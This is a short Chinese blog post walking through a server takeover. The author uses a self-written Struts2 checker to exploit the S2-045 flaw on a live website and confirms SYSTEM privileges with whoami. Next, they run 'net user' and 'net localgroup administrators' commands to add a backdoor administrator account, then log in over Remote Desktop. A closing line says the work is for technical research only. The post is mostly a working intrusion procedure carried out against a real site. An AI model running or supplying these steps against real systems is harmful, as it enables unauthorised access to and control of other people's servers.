Struts2版本系列漏洞检查工具提权服务器验证过程
Struts2版本系列漏洞检查工具提权服务器验证过程
通过我们编写的Struts2版本系列漏洞检查工具
来进行对漏洞的验证
该网站存在struts045的漏洞
那么我们先获取到whoami的信息
发现是系统权限,那么查看开放的端口?
我们发现3389是打开的
那么我们就可以建立一个用户并加入到管理员组
如net user 0x80 0x80890^&*/%(P /add & net localgroup administrators 0x80 /add
在命令输入net user 0x80 0x80890^&*/%(P /add & net localgroup administrators 0x80 /add
点击执行
接着我们返回查看用户信息
发现执行错误,那我们就单个执行
net user 0x80 0x80890^&*/%(P /add
net localgroup administrators 0x80 /add
发现已经成功建立了一个0x80的用户,我们看下是什么权限
接着加入管理员权限
net localgroup administrators 0x80 /add
点击执行
查看0x80的权限
是管理员权限,接着我们连接服务器,输入提权的用户密码
这里存在一个中文乱码的问题,需要弄成gb2312即可
net user 0x80 ghjA*(aA /add
点击确定
我们已经成功进入服务器
注意:只做技术研究,不做破坏!
<< 上一篇
下一篇 >>